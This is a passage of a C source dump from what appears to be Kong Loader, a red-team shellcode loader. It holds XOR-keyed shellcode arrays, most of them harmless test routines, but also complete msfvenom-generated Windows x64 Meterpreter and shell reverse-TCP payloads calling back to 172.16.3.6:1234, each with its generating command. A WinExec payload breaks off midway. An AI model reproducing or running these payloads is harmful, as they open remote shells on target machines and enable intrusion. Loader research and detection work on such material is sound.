35 | 0x48, 0xA1, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // mov rax, [0xFFFFFFFFFFFFFFFF] ; Move the value at the address 0xFFFFFFFFFFFFFFFF into RAX
36 | 0x48, 0xA1, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // mov rax, [0xFFFFFFFFFFFFFFFF] ; Move the value at the address 0xFFFFFFFFFFFFFFFF into RAX
37 | 0x48, 0xA1, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF // mov rax, [0xFFFFFFFFFFFFFFFF] ; Move the value at the address 0xFFFFFFFFFFFFFFFF into RAX
38 | };
39 |
--------------------------------------------------------------------------------
/src/shellcode/Custom-ArgumentAsString-1.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | * Predefined definitions
15 | */
16 | #define STATIC_SHELLCODE_NAME "Custom-ArgumentAsString-1" // Name to be printed
17 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x0 // May only be negative for debugging purposes with plain static shellcode
18 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x1 // Print return value of the shellcode to the console
19 |
20 | /**
21 | * The XOR password to use.
22 | */
23 | static uint8_t StaticPassword[] = { 0xAA };
24 |
25 | /**
26 | * The shellcode to use.
27 | *
28 | * This is custom written shellcode. It calls a non-existing function outside the shellcode, with a string as argument.
29 | */
30 | static uint8_t StaticShellcode[] = {
31 | 0x48, 0x8D, 0x0D, 0x05, 0x00, 0x00, 0x00, // lea rcx, [rip+0xA] ; Address of "hello" in rcx
32 | 0xE8, 0xF0, 0xFF, 0xFF, 0xFF, // call ; Relative call
33 | 0x68, 0x65, 0x6C, 0x6C, 0x6F, 0x00 // "hello\0" ; Null-terminated string at the end
34 | };
--------------------------------------------------------------------------------
/src/shellcode/Custom-ArgumentOnStack-1.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | * Predefined definitions
15 | */
16 | #define STATIC_SHELLCODE_NAME "Custom-ArgumentOnStack-1" // Name to be printed
17 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x0 // May only be negative for debugging purposes with plain static shellcode
18 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x1 // Print return value of the shellcode to the console
19 |
20 | /**
21 | * The XOR password to use.
22 | */
23 | static uint8_t StaticPassword[] = { 0xAA };
24 |
25 | /**
26 | * The shellcode to use.
27 | *
28 | * This is custom written shellcode. It calls a non-existing function outside the shellcode, with 5 arguments.
29 | */
30 | static uint8_t StaticShellcode[] = {
31 | 0x48, 0x31, 0xC0, // xor rax, rax ; Clear RAX register
32 | 0x48, 0xC7, 0xC1, 0x01, 0x00, 0x00, 0x00, // mov rcx, 1 ; Move 1 into RCX (first argument)
33 | 0x48, 0xC7, 0xC2, 0x02, 0x00, 0x00, 0x00, // mov rdx, 2 ; Move 2 into RDX (second argument)
34 | 0x49, 0xC7, 0xC0, 0x03, 0x00, 0x00, 0x00, // mov r8, 3 ; Move 3 into R8 (third argument)
35 | 0x4D, 0x8D, 0x0D, 0xF2, 0xFF, 0xFF, 0xFF, // lea r9, [rip-0x20] ; Load address in the shellcode into R9 (relative offset)
36 | 0x48, 0x83, 0xEC, 0x20, // sub rsp, 0x20 ; Allocate space on stack
37 | 0x6A, 0x06, // push 6 ; Push 6 onto the stack (sixth argument)
38 | 0x6A, 0x05, // push 5 ; Push 5 onto the stack (fifth argument)
39 | 0xE8, 0x00, 0x00, 0x00, 0x00, // call func ; Call the function (relative offset to be fixed)
40 | };
--------------------------------------------------------------------------------
/src/shellcode/Custom-KitchenSink-1.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | * Predefined definitions
15 | */
16 | #define STATIC_SHELLCODE_NAME "Custom-KitchenSink-1" // Name to be printed
17 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x0 // May only be negative for debugging purposes with plain static shellcode
18 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x1 // Print return value of the shellcode to the console
19 |
20 | /**
21 | * The XOR password to use.
22 | */
23 | static uint8_t StaticPassword[] = { 0xAA };
24 |
25 | /**
26 | * The shellcode to use.
27 | *
28 | * This is custom written shellcode. It performs various simple operations.
29 | */
30 | static uint8_t StaticShellcode[] = {
31 | // main()
32 | 0xE8, 0x10, 0x00, 0x00, 0x00, // call test_jmp_and_jl (relative offset)
33 | 0xE8, 0x2A, 0x00, 0x00, 0x00, // call test_je (relative offset)
34 | 0xE8, 0x3E, 0x00, 0x00, 0x00, // call test_jne (relative offset
35 | 0xE8, 0x52, 0x00, 0x00, 0x00, // call test_loop (relative offset
36 | 0xC3, // ret
37 |
38 | // FUNCTION: test_jmp_and_jl()
39 | // start
40 | // jumps over nops
41 | 0xEB, 0x04, // jmp short to skip over the nops
42 | 0x90, // nop
43 | 0x90, // nop
44 | 0x90, // nop
45 | 0x90, // nop
46 |
47 | // test_jmp_and_jl() + nops
48 | // jmp to
49 | 0x31, 0xC0, // xor eax, eax ; clear eax (set to zero)
50 | 0xB8, 0x41, 0x00, 0x00, 0x00, // mov eax 0x41
51 | 0x83, 0xF8, 0x42, // cmp eax, 0x42 ; compare eax with 0x42
52 | 0x7C, 0x07, // jl short less_than ; jump if less than
53 |
54 | // test_jmp_and_jl() + eax >= 0x42
55 | // does not execute
56 | // moves 0xAAAAAAAA to eax
57 | 0xB8, 0xAA, 0xAA, 0xAA, 0xAA, // mov eax, 0xAAAAAAAA
58 | 0xEB, 0x05, // jmp short end_jl
59 |
60 | // test_jmp_and_jl() + eax < 0x42
61 | // moves 0x13371337 to eax
62 | 0xB8, 0x37, 0x13, 0x37, 0x13, // mov eax, 0x13371337
63 |
64 | // test_jmp_and_jl() + end_jl
65 | 0xC3, // end_jl: ret
66 |
67 | // FUNCTION test_je()
68 | 0x31, 0xC0, // xor eax, eax ; clear eax (set to zero)
69 | 0xB8, 0x30, 0x00, 0x00, 0x00, // mov eax 0x30
70 | 0x83, 0xF8, 0x30, // cmp eax, 0x30 ; compare eax with 0x42
71 | 0x74, 0x07, // je short equal_to ; jump if equal
72 |
73 | // test_je() + eax != 0x30
74 | 0xB8, 0xBB, 0xBB, 0xBB, 0xBB, // mov eax, 0xBBBBBBBB
75 | 0xEB, 0x05, // jmp short end_jl
76 |
77 | // test_je() + eax == 0x30
78 | // moves 0x13371337 to eax
79 | 0xB8, 0x37, 0x13, 0x37, 0x13, // ov eax, 0x13371337
80 |
81 | // test_je() + end_je
82 | 0xC3, // end_je: ret
83 |
84 | // FUNCTION test_jne()
85 | 0x31, 0xC0, // xor eax, eax ; clear eax (set to zero)
86 | 0xB8, 0x30, 0x00, 0x00, 0x00, // mov eax 0x30
87 | 0x83, 0xF8, 0x30, // cmp eax, 0x30 ; compare eax with 0x42
88 | 0x75, 0x07, // jne short equal_to ; jump if equal
89 |
90 | // test_jne() + eax == 0x30
91 | 0xB8, 0x37, 0x13, 0x37, 0x13, // mov eax, 0x13371337
92 | 0xEB, 0x05, // jmp short end_jl
93 |
94 | // test_jne() + eax != 0x30
95 | // moves 0x13371337 to eax
96 | 0xB8, 0xCC, 0xCC, 0xCC, 0xCC, // mov eax, 0xCCCCCCCC
97 |
98 | // test_jne() + end_jne
99 | 0xC3, // end_jne: ret
100 |
101 | // FUNCTION test_loop()
102 | 0x31, 0xC9, // xor ecx, ecx ; clear ecx (set to zero)
103 | 0xB1, 0x05, // mov cl, 0x05 ; set ecx to 5
104 | 0x90, // nop ; do nothing
105 | 0x90, // nop ; do nothing
106 | 0x90, // nop ; do nothing
107 | 0x90, // nop ; do nothing
108 | 0x90, // nop ; do nothing
109 | 0xE2, 0xF9, // loop -0x07 ; loop to the beginning of nops
110 | 0xC3 // ret
111 | };
--------------------------------------------------------------------------------
/src/shellcode/Custom-Multiply-1.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | * Predefined definitions
15 | */
16 | #define STATIC_SHELLCODE_NAME "Custom-Multiply-1" // Name to be printed
17 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x0 // May only be negative for debugging purposes with plain static shellcode
18 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x1 // Print return value of the shellcode to the console
19 |
20 | /**
21 | * The XOR password to use.
22 | */
23 | static uint8_t StaticPassword[] = { 0xAA };
24 |
25 | /**
26 | * The shellcode to use.
27 | *
28 | * This is custom written shellcode. Performs a multiplication.
29 | */
30 | static uint8_t StaticShellcode[] = {
31 | // uint8_t* main()
32 | 0x48, 0x8D, 0x05, 0x0D, 0x00, 0x00, 0x00, // lea rax, [rip + 0x0F] ; Load address of the first operand
33 | 0x8B, 0x00, // mov eax, [rax] ; Move the first operand into EAX
34 | 0x48, 0x8D, 0x1D, 0x08, 0x00, 0x00, 0x00, // lea rbx, [rip + 0x09] ; Load address of the second operand
35 | 0x0F, 0xAF, 0x03, // imul eax, [rbx] ; Multiply EAX by the value at [RBX] (EAX = EAX * [RBX])
36 | 0xC3, // ret ; Return with the result in EAX
37 |
38 | // Operands storage
39 | 0x02, 0x00, 0x00, 0x00, // First operand: 2
40 | 0x03, 0x00, 0x00, 0x00 // Second operand: 3
41 | };
--------------------------------------------------------------------------------
/src/shellcode/Custom-Storage-1.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | * Predefined definitions
15 | */
16 | #define STATIC_SHELLCODE_NAME "Custom-Storage-1" // Name to be printed
17 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x0 // May only be negative for debugging purposes with plain static shellcode
18 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x1 // Print return value of the shellcode to the console
19 |
20 | /**
21 | * The XOR password to use.
22 | */
23 | static uint8_t StaticPassword[] = { 0xAA };
24 |
25 | /**
26 | * The shellcode to use.
27 | *
28 | * This is custom written shellcode. It calls another a piece of shellcode on the heap, mimicking encrypted argument use.
29 | */
30 | static uint8_t StaticShellcode[] = {
31 | // uint8_t* main()
32 | 0x48, 0x8D, 0x0D, 0x0D, 0x00, 0x00, 0x00, // lea rcx, [rip + 0x0D]
33 | 0xE8, 0x01, 0x00, 0x00, 0x00, // call get_return_value(rcx)
34 | 0xC3, // ret
35 |
36 | // uint8_t* get_return_value()
37 | 0x4C, 0x8B, 0x01, // mov r8, [rcx] ; load the value into r8
38 | 0x4C, 0x89, 0xC0, // mov rax, r8
39 | 0xC3, // ret
40 |
41 | // return value storage
42 | 0x37, 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, 0x13 // 0x13371337.13371337
43 | };
--------------------------------------------------------------------------------
/src/shellcode/Custom-Syscall-1.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | * Predefined definitions
15 | */
16 | #define STATIC_SHELLCODE_NAME "Custom-KitchenSink-1" // Name to be printed
17 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x0 // May only be negative for debugging purposes with plain static shellcode
18 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x1 // Print return value of the shellcode to the console
19 |
20 | /**
21 | * The XOR password to use.
22 | */
23 | static uint8_t StaticPassword[] = { 0xAA };
24 |
25 | /**
26 | * The shellcode to use.
27 | *
28 | * This is custom written shellcode. It calls NtTerminateProcess using a syscall
29 | */
30 | static uint8_t StaticShellcode[] = {
31 | // Setup syscall for NtTerminateProcess
32 | 0x4C, 0x8B, 0xD1, // mov r10, rcx ; Move rcx to r10 (for syscall convention)
33 | 0xB8, 0x2C, 0x00, 0x00, 0x00, // mov eax, 0x2C ; Syscall number for NtTerminateProcess
34 | 0xBA, 0xFF, 0xFF, 0xFF, 0xFF, // mov edx, 0xFFFFFFFF ; Handle for current process (-1)
35 | 0x48, 0x31, 0xF6, // xor rsi, rsi ; Exit status 0 (STATUS_SUCCESS)
36 | 0x0F, 0x05, // syscall ; Perform syscall
37 | 0xC3 // ret ; Return
38 | };
--------------------------------------------------------------------------------
/src/shellcode/Donut-MessageBoxA-1-Source.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | void main() {
4 | MessageBoxA(NULL, "Hello, World!", "My Message Box", MB_OK | MB_ICONINFORMATION);
5 | }
--------------------------------------------------------------------------------
/src/shellcode/Msfvenom-MeterpreterReverseTCP-2.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | * Predefined definitions
15 | */
16 | #define STATIC_SHELLCODE_NAME "Msfvenom-MeterpreterReverseTCP-2" // Name to be printed
17 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x0 // May only be negative for debugging purposes with plain static shellcode
18 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x0 // Print return value of the shellcode to the console
19 |
20 | /**
21 | * The XOR password to use.
22 | */
23 | static uint8_t StaticPassword[] = { 0xAA };
24 |
25 | /**
26 | * The shellcode to use.
27 | *
28 | * This was generated using MSFVENOM and formatted with CyberChef.
29 | * msfvenom --platform windows -i 0 -e generic/none --arch x64 -f c -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.3.6 LPORT=1234 EXITFUNC=none
30 | *
31 | */
32 | static uint8_t StaticShellcode[] = {
33 | 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00,
34 | 0x41, 0x51, 0x41, 0x50, 0x52, 0x48, 0x31, 0xd2, 0x51, 0x65,
35 | 0x48, 0x8b, 0x52, 0x60, 0x56, 0x48, 0x8b, 0x52, 0x18, 0x48,
36 | 0x8b, 0x52, 0x20, 0x4d, 0x31, 0xc9, 0x48, 0x0f, 0xb7, 0x4a,
37 | 0x4a, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x31, 0xc0, 0xac, 0x3c,
38 | 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
39 | 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52,
40 | 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78,
41 | 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b,
42 | 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67,
43 | 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40,
44 | 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41,
45 | 0x8b, 0x34, 0x88, 0x4d, 0x31, 0xc9, 0x48, 0x01, 0xd6, 0x48,
46 | 0x31, 0xc0, 0x41, 0xc1, 0xc9, 0x0d, 0xac, 0x41, 0x01, 0xc1,
47 | 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45,
48 | 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49,
49 | 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40,
50 | 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x41, 0x58,
51 | 0x48, 0x01, 0xd0, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58,
52 | 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52,
53 | 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9,
54 | 0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32,
55 | 0x5f, 0x33, 0x32, 0x00, 0x00, 0x41, 0x56, 0x49, 0x89, 0xe6,
56 | 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5,
57 | 0x49, 0xbc, 0x02, 0x00, 0x04, 0xd2, 0xac, 0x10, 0x03, 0x06,
58 | 0x41, 0x54, 0x49, 0x89, 0xe4, 0x4c, 0x89, 0xf1, 0x41, 0xba,
59 | 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68,
60 | 0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b,
61 | 0x00, 0xff, 0xd5, 0x6a, 0x0a, 0x41, 0x5e, 0x50, 0x50, 0x4d,
62 | 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89,
63 | 0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea,
64 | 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x48, 0x89, 0xc7, 0x6a, 0x10,
65 | 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba,
66 | 0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a,
67 | 0x49, 0xff, 0xce, 0x75, 0xe5, 0xe8, 0x93, 0x00, 0x00, 0x00,
68 | 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9,
69 | 0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02,
70 | 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7e, 0x55,
71 | 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41,
72 | 0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89,
73 | 0xf2, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x58, 0xa4, 0x53, 0xe5,
74 | 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31,
75 | 0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9,
76 | 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8,
77 | 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40,
78 | 0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b,
79 | 0x2f, 0x0f, 0x30, 0xff, 0xd5, 0x57, 0x59, 0x41, 0xba, 0x75,
80 | 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c,
81 | 0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48,
82 | 0x85, 0xf6, 0x75, 0xb4, 0x41, 0xff, 0xe7, 0x58
83 | };
--------------------------------------------------------------------------------
/src/shellcode/Msfvenom-ShellReverseTCP-1.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | * Predefined definitions
15 | */
16 | #define STATIC_SHELLCODE_NAME "Msfvenom-ShellReverseTCP-1" // Name to be printed
17 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x1 // May only be negative for debugging purposes with plain static shellcode
18 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x0 // Print return value of the shellcode to the console
19 |
20 | /**
21 | * The XOR password to use.
22 | */
23 | static uint8_t StaticPassword[] = { 0xAA, 0x41, 0xCC };
24 |
25 | /**
26 | * The shellcode to use.
27 | *
28 | * This was generated using MSFVENOM and formatted with CyberChef.
29 | * msfvenom --platform windows -i 0 -e generic/none --arch x64 -f c -p windows/x64/shell_reverse_tcp LHOST=172.16.3.6 LPORT=1234 EXITFUNC=none
30 | */
31 | static uint8_t StaticShellcode[] = {
32 | 0x56,0x09,0x4f,0x4e,0xb1,0x24,0x6a,0x41,0xcc,0xaa,0x00,0x9d,0xeb,0x11,
33 | 0x9e,0xfb,0x17,0x84,0x9b,0x93,0xa9,0xe2,0xca,0x9e,0xca,0x09,0x47,0xf8,
34 | 0x59,0x84,0x21,0x13,0xec,0xe2,0xca,0xbe,0xfa,0x09,0xc3,0x1d,0x0b,0x86,
35 | 0xe7,0x70,0x05,0xe2,0x70,0x0c,0x06,0x7d,0xad,0xd6,0x43,0xe0,0x8a,0x00,
36 | 0x0d,0x63,0x4c,0x8d,0xab,0x80,0x2e,0x47,0x13,0x8d,0xfb,0x09,0x47,0xf8,
37 | 0x61,0x47,0xe8,0x7d,0x84,0xab,0x91,0x47,0x2a,0xc9,0xcc,0xaa,0x41,0x84,
38 | 0x2f,0x81,0xb8,0xcd,0x09,0xcd,0x7a,0x11,0x47,0xe2,0x59,0x88,0x21,0x01,
39 | 0xec,0xe3,0x40,0x1c,0x49,0x17,0x84,0x55,0x88,0x8d,0x21,0x75,0x44,0xe2,
40 | 0x40,0x1a,0xe7,0x70,0x05,0xe2,0x70,0x0c,0x06,0x00,0x0d,0x63,0x4c,0x8d,
41 | 0xab,0x80,0xf4,0x4a,0x34,0x3d,0xe6,0x42,0x80,0x8e,0x49,0x89,0x93,0x90,
42 | 0xb9,0x72,0x19,0x88,0x21,0x01,0xe8,0xe3,0x40,0x1c,0xcc,0x00,0x47,0xa6,
43 | 0x09,0x88,0x21,0x01,0xd0,0xe3,0x40,0x1c,0xeb,0xca,0xc8,0x22,0x09,0xcd,
44 | 0x7a,0x00,0x94,0xeb,0x19,0x92,0xf3,0x1b,0x8d,0xf2,0x00,0x95,0xeb,0x1b,
45 | 0x84,0x29,0xad,0xec,0xeb,0x13,0x33,0x4a,0x19,0x8d,0xf3,0x1b,0x84,0x21,
46 | 0x53,0x25,0xfd,0xbe,0x33,0x55,0x1c,0x85,0x14,0x36,0xbf,0x98,0x1e,0xff,
47 | 0x98,0x41,0xcc,0xeb,0x17,0x85,0x23,0xa7,0x84,0x2b,0xad,0x6c,0xab,0x41,
48 | 0xcc,0xe3,0xc8,0x29,0xe3,0xfd,0xce,0xaa,0x45,0x1e,0x06,0x51,0xcf,0xa9,
49 | 0x00,0x98,0xe3,0xc8,0x28,0xe6,0xc8,0x3d,0xeb,0xfb,0x80,0xdd,0x67,0xcb,
50 | 0x55,0x94,0x80,0x23,0xab,0xa4,0xab,0x40,0xcc,0xaa,0x18,0x8d,0x10,0x68,
51 | 0x4c,0xc1,0x41,0x33,0x7f,0x11,0x9c,0xe7,0x70,0x05,0xe7,0x70,0x0c,0xe2,
52 | 0xbe,0x0c,0xe2,0xc8,0x0e,0xe2,0xbe,0x0c,0xe2,0xc8,0x0d,0xeb,0xfb,0x26,
53 | 0xa5,0x9e,0x2c,0x55,0x94,0x84,0x23,0x86,0xa6,0xba,0x00,0x94,0xe6,0xc8,
54 | 0x2e,0xe2,0xc8,0x35,0xeb,0xfb,0x55,0x0f,0x35,0xad,0x55,0x94,0x84,0x2b,
55 | 0x85,0x8c,0xa8,0x41,0xcc,0xe3,0xf9,0xaf,0xc7,0x25,0xcc,0xaa,0x41,0xcc,
56 | 0xaa,0x00,0x9c,0xeb,0x11,0x84,0x23,0xa3,0x9b,0xfd,0x16,0x81,0x9b,0x81,
57 | 0xa6,0xa7,0x18,0x8d,0xfa,0xa3,0x30,0xcc,0x86,0x88,0x8e,0x15,0xcd,0xab,
58 | 0x09,0x41,0xee,0x65,0xd4,0x6c,0x41,0xa4,0xe2,0xc8,0x2a,0xfc,0x11,0x8d,
59 | 0xfa,0x00,0x9c,0xeb,0x11,0x85,0x55,0x81,0x8d,0xfa,0x08,0x33,0x62,0x0c,
60 | 0x45,0x6b,0x0d,0x45,0x6b,0x00,0x76,0xd3,0x8d,0xf3,0x2c,0xbe,0x19,0xe2,
61 | 0x70,0x1e,0xe2,0xbe,0x06,0x21,0x4f,0x8d,0x10,0x49,0x4b,0xb7,0x21,0x33,
62 | 0x7f,0xfa,0x66,0x6f,0xa3,0x91,0xeb,0xfb,0x6a,0x3f,0xfc,0x51,0x55,0x94,
63 | 0x84,0x29,0x85,0xe4,0x96,0x47,0xb0,0xa0,0xc1,0x37,0x4a,0x34,0xc9,0x11,
64 | 0x06,0xdf,0xd8,0x2e,0xa6,0xaa,0x18,0x8d,0x23,0x9b,0x33,0x7f
65 | };
--------------------------------------------------------------------------------
/src/shellcode/Msfvenom-WinExec-1.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | * Predefined definitions
15 | */
16 | #define STATIC_SHELLCODE_NAME "Msfvenom-WinExec-1" // Name to be printed
17 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x1 // May only be negative for debugging purposes with plain static shellcode
18 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x0 // Print return value of the shellcode to the console
19 |
20 | /**
21 | * The XOR password to use.
22 | */
23 | static uint8_t StaticPassword[] = { 0xAA, 0x41, 0xCC };
24 |
25 | /**
26 | * The shellcode to use.
27 | *
28 | * This was generated using MSFVENOM and formatted with CyberChef.
29 | * msfvenom --platform windows -i 0 -e generic/none --arch x64 -f c -p windows/x64/exec CMD=calc.exe EXITFUNC=none
30 | * https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'%20'%7D,'',true,false,true,false)Find_/_Replace(%7B'option':'Regex','string':'%5C%5Cn'%7D,'',true,false,true,false)From_Hex('0x%20with%20comma')XOR(%7B'option':'Hex','string':'AA41CC'%7D,'Standard',false)To_Hex('0x%20with%20comma',12)
31 | */
32 | static uint8_t StaticShellcode[] = {
33 | 0x56,0x09,0x4f,0x4e,0xb1,0x24,0x6a,0x41,0xcc,0xaa,0x00,0x9d,
34 | 0xeb,0x11,0x9e,0xfb,0x17,0x84,0x9b,0x93,0xa9,0xe2,0xca,0x9e,
35 | 0xca,0x09,0x47,0xf8,0x59,0x84,0x21,0x13,0xec,0xe2,0xca,0xbe,
36 | 0xfa,0x09,0xc3,0x1d,0x0b,0x86,0xe7,0x70,0x05,0xe2,0x70,0x0c,
37 | 0x06,0x7d,0xad,0xd6,0x43,0xe0,0x8a,0x00,0x0d,0x63,0x4c,0x8d,
38 | 0xab,0x80,0x2e,0x47,0x13,0x8d,0xfb,0x09,0x47,0xf8,0x61,0x47,
39 | 0xe8,0x7d,0x84,0xab,0x91,0x47,0x2a,0xc9,0xcc,0xaa,0x41,0x84,
40 | 0x2f,0x81,0xb8,0xcd,0x09,0xcd,0x7a,0x11,0x47,0xe2,0x59,0x88,
